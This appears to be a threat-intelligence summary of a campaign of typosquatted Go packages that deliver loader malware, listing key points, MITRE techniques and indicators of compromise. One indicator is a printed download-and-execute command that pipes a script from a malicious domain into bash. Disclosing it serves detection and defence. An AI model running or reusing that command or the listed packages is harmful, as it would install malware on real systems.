A recent analysis reveals a sustained malicious campaign targeting the Go ecosystem, utilizing typosquatted packages to distribute loader malware to Linux and macOS systems. At least seven packages were identified as impersonating popular Go libraries, with a significant focus on deception aimed at financial-sector developers. The malware employs obfuscation techniques and has been linked to multiple malicious domains while remaining accessible on Go Module Mirror. Affected: Go ecosystem, Linux, macOS, financial sector.
Keypoints :
- A malicious campaign targets the Go ecosystem with typosquatted packages.
- At least seven packages identified, impersonating legitimate Go libraries.
- Key focus on financial developers, particularly regarding a Go library for HTTP API clients.
- Malware designed for execution on Linux and macOS systems.
- Obfuscation techniques used to evade detection.
- Malicious packages continue to remain on Go Module Mirror despite reporting.
- Threat actor employs multiple domains associated with the malware.
- Recommendations for developers include vigilance in dependency management and real-time scanning tools.
MITRE Techniques :
- T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain (The malicious packages are typosquatted versions of legitimate libraries.)
- T1583.001 — Acquire Infrastructure: Domains (Malware utilizes domains that mimic legitimate websites.)
- T1608.001 — Stage Capabilities: Upload Malware (The threat actor uploads malicious packages to repositories.)
- T1204.002 — User Execution: Malicious File (The malicious payload executes on import of the package.)
- T1036.005 — Masquerading: Match Legitimate Name or Location (Typosquatted package names resemble legitimate library names.)
- T1027.013 — Obfuscated Files or Information: Encrypted/Encoded File (Malicious commands are obfuscated using arrays of strings.)
- T1546.016 — Event Triggered Execution: Installer Packages (Malicious packages invoke execution upon import.)
- T1059.004 — Command and Scripting Interpreter: Unix Shell (The payload executes shell commands using sh.)
- T1497 — Virtualization/Sandbox Evasion (The malware tactics evade basic detection tools.)
- T1657 — Financial Theft (Targets financial-sector developers for potential data theft.)
Indicator of Compromise :
- [Malicious Package] github.com/shallowmulti/hypert
- [Malicious Package] github.com/shadowybulk/hypert
- [Malicious Package] github.com/belatedplanet/hypert
- [Malicious Package] github.com/thankfulmai/hypert
- [Malicious Domain] alturastreet[.]icu
- [Malicious Domain] binghost7[.]com
- [IP Address] 185.100.157[.]127
- [Malicious Script] wget -O – https://alturastreet[.]icu/storage/de373d0df/a31546bf | /bin/bash
<li[SHA256 Hash] b0d20a3dcb937da1ddb01684f6040bdbb920ac19446364e949ee8ba5b50a29e4
<li[SHA256 Hash] f70bc9a8e39eb36547717197efe88173c23c1b9c206d253f0e24a8aaadf0f915
Full Story: https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader